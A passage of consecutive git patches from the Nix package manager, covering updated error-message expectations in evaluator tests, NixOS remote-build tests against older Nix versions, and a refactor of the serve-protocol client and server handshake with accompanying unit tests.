evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", @@ -1115,12 +1115,12 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", @@ -1133,12 +1133,12 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" {}", TypeError, - hintfmt("value is %s while a list was expected", "a set"), + hintfmt("expected a list but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", @@ -1152,7 +1152,7 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1161,12 +1161,12 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1175,7 +1175,7 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.splitVersion")); } @@ -1189,7 +1189,7 @@ namespace nix { TEST_F(ErrorTraceTest, derivationStrict) { ASSERT_TRACE2("derivationStrict \"\"", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", "\"\""), hintfmt("while evaluating the argument passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict {}", @@ -1199,7 +1199,7 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = 1; }", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", "1"), hintfmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; }", @@ -1209,12 +1209,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __structuredAttrs = 15; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), hintfmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __ignoreNulls = 15; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), hintfmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = 15; }", @@ -1259,22 +1259,22 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __contentAddressed = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = \"foo\"; }", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", "\"foo\""), hintfmt("while evaluating the attribute 'args' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", From e502d1cf945fb3cdd0ca1e1c16ec330ccab51c7b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:34:52 +0100 Subject: [PATCH 325/654] tests/nixos: Test remote build against older versions --- tests/nixos/default.nix | 100 +++++++++++++++++++++++++++ tests/nixos/remote-builds-ssh-ng.nix | 21 +++++- tests/nixos/remote-builds.nix | 21 +++++- 3 files changed, 136 insertions(+), 6 deletions(-) diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 1a42f886c..8f4fa2621 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -28,6 +28,13 @@ let }; }; + # Checks that a NixOS configuration does not contain any references to our + # locally defined Nix version. + checkOverrideNixVersion = { pkgs, lib, ... }: { + # pkgs.nix: The new Nix in this repo + # We disallow it, to make sure we don't accidentally use it. + system.forbiddenDependenciesRegex = lib.strings.escapeRegex "nix-${pkgs.nix.version}"; + }; in { @@ -35,8 +42,101 @@ in remoteBuilds = runNixOSTestFor "x86_64-linux" ./remote-builds.nix; + # Test our Nix as a client against remotes that are older + + remoteBuilds_remote_2_3 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuilds_remote_2_3"; + imports = [ ./remote-builds.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }; + + remoteBuilds_remote_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_remote_2_13"; + imports = [ ./remote-builds.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + # TODO: (nixpkgs update) remoteBuilds_remote_2_18 = ... + + # Test our Nix as a builder for clients that are older + + remoteBuilds_local_2_3 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_local_2_3"; + imports = [ ./remote-builds.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + remoteBuilds_local_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuilds_local_2_13"; + imports = [ ./remote-builds.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }); + + # TODO: (nixpkgs update) remoteBuilds_local_2_18 = ... + + # End remoteBuilds tests + remoteBuildsSshNg = runNixOSTestFor "x86_64-linux" ./remote-builds-ssh-ng.nix; + # Test our Nix as a client against remotes that are older + + remoteBuildsSshNg_remote_2_3 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuildsSshNg_remote_2_3"; + imports = [ ./remote-builds-ssh-ng.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }; + + remoteBuildsSshNg_remote_2_13 = runNixOSTestFor "x86_64-linux" { + name = "remoteBuildsSshNg_remote_2_13"; + imports = [ ./remote-builds-ssh-ng.nix ]; + builders.config = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }; + + # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ... + + # Test our Nix as a builder for clients that are older + + # FIXME: these tests don't work yet + /* + remoteBuildsSshNg_local_2_3 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuildsSshNg_local_2_3"; + imports = [ ./remote-builds-ssh-ng.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_3; + }; + }); + + remoteBuildsSshNg_local_2_13 = runNixOSTestFor "x86_64-linux" ({ lib, pkgs, ... }: { + name = "remoteBuildsSshNg_local_2_13"; + imports = [ ./remote-builds-ssh-ng.nix ]; + nodes.client = { lib, pkgs, ... }: { + imports = [ checkOverrideNixVersion ]; + nix.package = lib.mkForce pkgs.nixVersions.nix_2_13; + }; + }); + + # TODO: (nixpkgs update) remoteBuildsSshNg_local_2_18 = ... + */ + nix-copy-closure = runNixOSTestFor "x86_64-linux" ./nix-copy-closure.nix; nix-copy = runNixOSTestFor "x86_64-linux" ./nix-copy.nix; diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index 20a43803d..b9174a788 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -1,4 +1,4 @@ -{ config, lib, hostPkgs, ... }: +test@{ config, lib, hostPkgs, ... }: let pkgs = config.nodes.client.nixpkgs.pkgs; @@ -28,12 +28,27 @@ let in { - name = "remote-builds-ssh-ng"; + name = lib.mkDefault "remote-builds-ssh-ng"; + + # TODO expand module shorthand syntax instead of use imports + imports = [{ + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; + }; + }; + }]; nodes = { builder = { config, pkgs, ... }: - { services.openssh.enable = true; + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; nix.settings.sandbox = true; nix.settings.substituters = lib.mkForce [ ]; diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index ad7f509db..6f9b0ebf0 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -1,6 +1,6 @@ # Test Nix's remote build feature. -{ config, lib, hostPkgs, ... }: +test@{ config, lib, hostPkgs, ... }: let pkgs = config.nodes.client.nixpkgs.pkgs; @@ -8,7 +8,9 @@ let # The configuration of the remote builders. builder = { config, pkgs, ... }: - { services.openssh.enable = true; + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; nix.settings.sandbox = true; @@ -35,7 +37,20 @@ let in { - name = "remote-builds"; + name = lib.mkDefault "remote-builds"; + + # TODO expand module shorthand syntax instead of use imports + imports = [{ + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; + }; + }; + }]; nodes = { builder1 = builder; From ce2f714e6daa0250f30bc3a14967e4e3a7777d9f Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 20 Feb 2022 19:24:07 +0000 Subject: [PATCH 326/654] Start factoring out the serve protocol for Hydra to share Factor out `ServeProto::BasicClientConnection` for Hydra to share - `queryValidPaths`: Hydra uses the lock argument differently than Nix, so we un-hard-code it. - `buildDerivationRequest`: Just the request half, as Hydra does some things between requesting and responding. Co-authored-by: Robert Hensing --- src/libstore/legacy-ssh-store.cc | 65 ++++------------------------- src/libstore/legacy-ssh-store.hh | 4 -- src/libstore/serve-protocol-impl.cc | 38 +++++++++++++++++ src/libstore/serve-protocol-impl.hh | 54 ++++++++++++++++++++++++ src/libstore/serve-protocol.hh | 7 ++++ 5 files changed, 107 insertions(+), 61 deletions(-) create mode 100644 src/libstore/serve-protocol-impl.cc diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 06bef9d08..b89dd5fd9 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -22,45 +22,10 @@ std::string LegacySSHStoreConfig::doc() } -struct LegacySSHStore::Connection +struct LegacySSHStore::Connection : public ServeProto::BasicClientConnection { std::unique_ptr sshConn; - FdSink to; - FdSource from; - ServeProto::Version remoteVersion; bool good = true; - - /** - * Coercion to `ServeProto::ReadConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::ReadConn () - { - return ServeProto::ReadConn { - .from = from, - .version = remoteVersion, - }; - } - - /* - * Coercion to `ServeProto::WriteConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::WriteConn () - { - return ServeProto::WriteConn { - .to = to, - .version = remoteVersion, - }; - } }; @@ -232,16 +197,16 @@ void LegacySSHStore::narFromPath(const StorePath & path, Sink & sink) } -void LegacySSHStore::putBuildSettings(Connection & conn) +static ServeProto::BuildOptions buildSettings() { - ServeProto::write(*this, conn, ServeProto::BuildOptions { + return { .maxSilentTime = settings.maxSilentTime, .buildTimeout = settings.buildTimeout, .maxLogSize = settings.maxLogSize, .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway .enforceDeterminism = 0, .keepFailed = settings.keepFailed, - }); + }; } @@ -250,14 +215,7 @@ BuildResult LegacySSHStore::buildDerivation(const StorePath & drvPath, const Bas { auto conn(connections->get()); - conn->to - << ServeProto::Command::BuildDerivation - << printStorePath(drvPath); - writeDerivation(conn->to, *this, drv); - - putBuildSettings(*conn); - - conn->to.flush(); + conn->putBuildDerivationRequest(*this, drvPath, drv, buildSettings()); return ServeProto::Serialise::read(*this, *conn); } @@ -288,7 +246,7 @@ void LegacySSHStore::buildPaths(const std::vector & drvPaths, Build } conn->to << ss; - putBuildSettings(*conn); + ServeProto::write(*this, *conn, buildSettings()); conn->to.flush(); @@ -328,15 +286,8 @@ StorePathSet LegacySSHStore::queryValidPaths(const StorePathSet & paths, SubstituteFlag maybeSubstitute) { auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryValidPaths - << false // lock - << maybeSubstitute; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); + return conn->queryValidPaths(*this, + false, paths, maybeSubstitute); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index 7cee31d66..bdf79eab3 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -78,10 +78,6 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair = NoRepair) override { unsupported("addToStore"); } -private: - - void putBuildSettings(Connection & conn); - public: BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc new file mode 100644 index 000000000..e65de7650 --- /dev/null +++ b/src/libstore/serve-protocol-impl.cc @@ -0,0 +1,38 @@ +#include "serve-protocol-impl.hh" +#include "build-result.hh" +#include "derivations.hh" + +namespace nix { + +StorePathSet ServeProto::BasicClientConnection::queryValidPaths( + const Store & store, + bool lock, const StorePathSet & paths, + SubstituteFlag maybeSubstitute) +{ + to + << ServeProto::Command::QueryValidPaths + << lock + << maybeSubstitute; + write(store, *this, paths); + to.flush(); + + return Serialise::read(store, *this); +} + + +void ServeProto::BasicClientConnection::putBuildDerivationRequest( + const Store & store, + const StorePath & drvPath, const BasicDerivation & drv, + const ServeProto::BuildOptions & options) +{ + to + << ServeProto::Command::BuildDerivation + << store.printStorePath(drvPath); + writeDerivation(to, store, drv); + + ServeProto::write(store, *this, options); + + to.flush(); +} + +} diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 6f3b177ac..312f5d47a 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -10,6 +10,7 @@ #include "serve-protocol.hh" #include "length-prefixed-protocol-helper.hh" +#include "store-api.hh" namespace nix { @@ -56,4 +57,57 @@ struct ServeProto::Serialise /* protocol-specific templates */ +struct ServeProto::BasicClientConnection +{ + FdSink to; + FdSource from; + ServeProto::Version remoteVersion; + + /** + * Coercion to `ServeProto::ReadConn`. This makes it easy to use the + * factored out serve protocol serializers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type. + */ + operator ServeProto::ReadConn () + { + return ServeProto::ReadConn { + .from = from, + .version = remoteVersion, + }; + } + + /** + * Coercion to `ServeProto::WriteConn`. This makes it easy to use the + * factored out serve protocol serializers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type. + */ + operator ServeProto::WriteConn () + { + return ServeProto::WriteConn { + .to = to, + .version = remoteVersion, + }; + } + + StorePathSet queryValidPaths( + const Store & remoteStore, + bool lock, const StorePathSet & paths, + SubstituteFlag maybeSubstitute); + + /** + * Just the request half, because Hydra may do other things between + * issuing the request and reading the `BuildResult` response. + */ + void putBuildDerivationRequest( + const Store & store, + const StorePath & drvPath, const BasicDerivation & drv, + const ServeProto::BuildOptions & options); +}; + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 1665b935f..632c4b6bd 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -59,6 +59,13 @@ struct ServeProto Version version; }; + /** + * Stripped down serialization logic suitable for sharing with Hydra. + * + * @todo remove once Hydra uses Store abstraction consistently. + */ + struct BasicClientConnection; + /** * Data type for canonical pairs of serialisers for the serve protocol. * From 4580bed3e47eba844ec905d7a0e5fec79fb06b67 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 10:24:07 -0500 Subject: [PATCH 327/654] `LegacySSHStore::openConnection` move more logic inside catch block Broader error handling logic is more robust. --- src/libstore/legacy-ssh-store.cc | 29 ++++++++++++++--------------- 1 file changed, 14 insertions(+), 15 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index b89dd5fd9..058b1affd 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -61,28 +61,27 @@ ref LegacySSHStore::openConnection() conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); + StringSink saved; + TeeSource tee(conn->from, saved); try { conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; conn->to.flush(); - StringSink saved; - try { - TeeSource tee(conn->from, saved); - unsigned int magic = readInt(tee); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - } catch (SerialisationError & e) { - /* In case the other side is waiting for our input, - close it. */ - conn->sshConn->in.close(); - auto msg = conn->from.drain(); - throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", - host, chomp(saved.s + msg)); - } + unsigned int magic = readInt(conn->from); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); conn->remoteVersion = readInt(conn->from); if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); - + } catch (SerialisationError & e) { + // in.close(): Don't let the remote block on us not writing. + conn->sshConn->in.close(); + { + NullSink nullSink; + conn->from.drainInto(nullSink); + } + throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", + host, chomp(saved.s)); } catch (EndOfFile & e) { throw Error("cannot connect to '%1%'", host); } From 4a5ca576da511fcc64039c2494f41f710d662478 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 20 Feb 2022 19:24:07 +0000 Subject: [PATCH 328/654] Factor out `ServeProto::BasicClientConnection::handshake` Hydra to share --- src/libstore/legacy-ssh-store.cc | 11 ++--------- src/libstore/serve-protocol-impl.cc | 19 +++++++++++++++++++ src/libstore/serve-protocol-impl.hh | 22 ++++++++++++++++++++++ 3 files changed, 43 insertions(+), 9 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 058b1affd..4f020c452 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -64,15 +64,8 @@ ref LegacySSHStore::openConnection() StringSink saved; TeeSource tee(conn->from, saved); try { - conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; - conn->to.flush(); - - unsigned int magic = readInt(conn->from); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - conn->remoteVersion = readInt(conn->from); - if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) - throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + conn->remoteVersion = ServeProto::BasicClientConnection::handshake( + conn->to, tee, SERVE_PROTOCOL_VERSION, host); } catch (SerialisationError & e) { // in.close(): Don't let the remote block on us not writing. conn->sshConn->in.close(); diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc index e65de7650..6bf6c8cf6 100644 --- a/src/libstore/serve-protocol-impl.cc +++ b/src/libstore/serve-protocol-impl.cc @@ -4,6 +4,25 @@ namespace nix { +ServeProto::Version ServeProto::BasicClientConnection::handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion, + std::string_view host) +{ + to << SERVE_MAGIC_1 << localVersion; + to.flush(); + + unsigned int magic = readInt(from); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); + auto remoteVersion = readInt(from); + if (GET_PROTOCOL_MAJOR(remoteVersion) != 0x200) + throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + return remoteVersion; +} + + StorePathSet ServeProto::BasicClientConnection::queryValidPaths( const Store & store, bool lock, const StorePathSet & paths, diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 312f5d47a..8cd241fd3 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -63,6 +63,28 @@ struct ServeProto::BasicClientConnection FdSource from; ServeProto::Version remoteVersion; + /** + * Establishes connection, negotiating version. + * + * @return the version provided by the other side of the + * connection. + * + * @param to Taken by reference to allow for various error handling + * mechanisms. + * + * @param from Taken by reference to allow for various error + * handling mechanisms. + * + * @param localVersion Our version which is sent over + * + * @param host Just used to add context to thrown exceptions. + */ + static ServeProto::Version handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion, + std::string_view host); + /** * Coercion to `ServeProto::ReadConn`. This makes it easy to use the * factored out serve protocol serializers with a From e960b2823091f7c6685b55d5f1ad8d7612130009 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 16:38:08 -0500 Subject: [PATCH 329/654] Factor our `ServeProto::BasicServerConnection::handshake` We'll need this for unit testing. Co-authored-by: Robert Hensing --- src/libstore/serve-protocol-impl.cc | 12 ++++++++++++ src/libstore/serve-protocol-impl.hh | 22 ++++++++++++++++++++++ src/libstore/serve-protocol.hh | 1 + src/nix-store/nix-store.cc | 8 +++----- 4 files changed, 38 insertions(+), 5 deletions(-) diff --git a/src/libstore/serve-protocol-impl.cc b/src/libstore/serve-protocol-impl.cc index 6bf6c8cf6..b39212884 100644 --- a/src/libstore/serve-protocol-impl.cc +++ b/src/libstore/serve-protocol-impl.cc @@ -22,6 +22,18 @@ ServeProto::Version ServeProto::BasicClientConnection::handshake( return remoteVersion; } +ServeProto::Version ServeProto::BasicServerConnection::handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion) +{ + unsigned int magic = readInt(from); + if (magic != SERVE_MAGIC_1) throw Error("protocol mismatch"); + to << SERVE_MAGIC_2 << localVersion; + to.flush(); + return readInt(from); +} + StorePathSet ServeProto::BasicClientConnection::queryValidPaths( const Store & store, diff --git a/src/libstore/serve-protocol-impl.hh b/src/libstore/serve-protocol-impl.hh index 8cd241fd3..fd8d94697 100644 --- a/src/libstore/serve-protocol-impl.hh +++ b/src/libstore/serve-protocol-impl.hh @@ -132,4 +132,26 @@ struct ServeProto::BasicClientConnection const ServeProto::BuildOptions & options); }; +struct ServeProto::BasicServerConnection +{ + /** + * Establishes connection, negotiating version. + * + * @return the version provided by the other side of the + * connection. + * + * @param to Taken by reference to allow for various error handling + * mechanisms. + * + * @param from Taken by reference to allow for various error + * handling mechanisms. + * + * @param localVersion Our version which is sent over + */ + static ServeProto::Version handshake( + BufferedSink & to, + Source & from, + ServeProto::Version localVersion); +}; + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 632c4b6bd..8c112bb74 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -65,6 +65,7 @@ struct ServeProto * @todo remove once Hydra uses Store abstraction consistently. */ struct BasicClientConnection; + struct BasicServerConnection; /** * Data type for canonical pairs of serialisers for the serve protocol. diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 0a0a3ab1a..40378e123 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -828,11 +828,9 @@ static void opServe(Strings opFlags, Strings opArgs) FdSink out(STDOUT_FILENO); /* Exchange the greeting. */ - unsigned int magic = readInt(in); - if (magic != SERVE_MAGIC_1) throw Error("protocol mismatch"); - out << SERVE_MAGIC_2 << SERVE_PROTOCOL_VERSION; - out.flush(); - ServeProto::Version clientVersion = readInt(in); + ServeProto::Version clientVersion = + ServeProto::BasicServerConnection::handshake( + out, in, SERVE_PROTOCOL_VERSION); ServeProto::ReadConn rconn { .from = in, From 1fb25829692e5455c0edec96226af295957d99b4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 18:42:27 -0500 Subject: [PATCH 330/654] Create unit tests for the serve proto handshake Co-authored-by: Robert Hensing --- .../serve-protocol/handshake-to-client.bin | Bin 0 -> 16 bytes tests/unit/libstore/serve-protocol.cc | 110 ++++++++++++++++++ 2 files changed, 110 insertions(+) create mode 100644 tests/unit/libstore/data/serve-protocol/handshake-to-client.bin diff --git a/tests/unit/libstore/data/serve-protocol/handshake-to-client.bin b/tests/unit/libstore/data/serve-protocol/handshake-to-client.bin new file mode 100644 index 0000000000000000000000000000000000000000..15ba4b5e3d96e388637107542f6eb9f7e94ac708 GIT binary patch literal 16 RcmX^8E+~Wn1em}i0{|m{0%8CF literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 8f256d1e6..597c0b570 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -1,3 +1,4 @@ +#include #include #include @@ -6,6 +7,7 @@ #include "serve-protocol.hh" #include "serve-protocol-impl.hh" #include "build-result.hh" +#include "file-descriptor.hh" #include "tests/protocol.hh" #include "tests/characterization.hh" @@ -401,4 +403,112 @@ VERSIONED_CHARACTERIZATION_TEST( }, })) +TEST_F(ServeProtoTest, handshake_log) +{ + CharacterizationTest::writeTest("handshake-to-client", [&]() -> std::string { + StringSink toClientLog; + + Pipe toClient, toServer; + toClient.create(); + toServer.create(); + + ServeProto::Version clientResult, serverResult; + + auto thread = std::thread([&]() { + FdSink out { toServer.writeSide.get() }; + FdSource in0 { toClient.readSide.get() }; + TeeSource in { in0, toClientLog }; + clientResult = ServeProto::BasicClientConnection::handshake( + out, in, defaultVersion, "blah"); + }); + + { + FdSink out { toClient.writeSide.get() }; + FdSource in { toServer.readSide.get() }; + serverResult = ServeProto::BasicServerConnection::handshake( + out, in, defaultVersion); + }; + + thread.join(); + + return std::move(toClientLog.s); + }); +} + +/// Has to be a `BufferedSink` for handshake. +struct NullBufferedSink : BufferedSink { + void writeUnbuffered(std::string_view data) override { } +}; + +TEST_F(ServeProtoTest, handshake_client_replay) +{ + CharacterizationTest::readTest("handshake-to-client", [&](std::string toClientLog) { + NullBufferedSink nullSink; + + StringSource in { toClientLog }; + auto clientResult = ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"); + + EXPECT_EQ(clientResult, defaultVersion); + }); +} + +TEST_F(ServeProtoTest, handshake_client_truncated_replay_throws) +{ + CharacterizationTest::readTest("handshake-to-client", [&](std::string toClientLog) { + for (size_t len = 0; len < toClientLog.size(); ++len) { + NullBufferedSink nullSink; + StringSource in { + // truncate + toClientLog.substr(0, len) + }; + if (len < 8) { + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + EndOfFile); + } else { + // Not sure why cannot keep on checking for `EndOfFile`. + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + Error); + } + } + 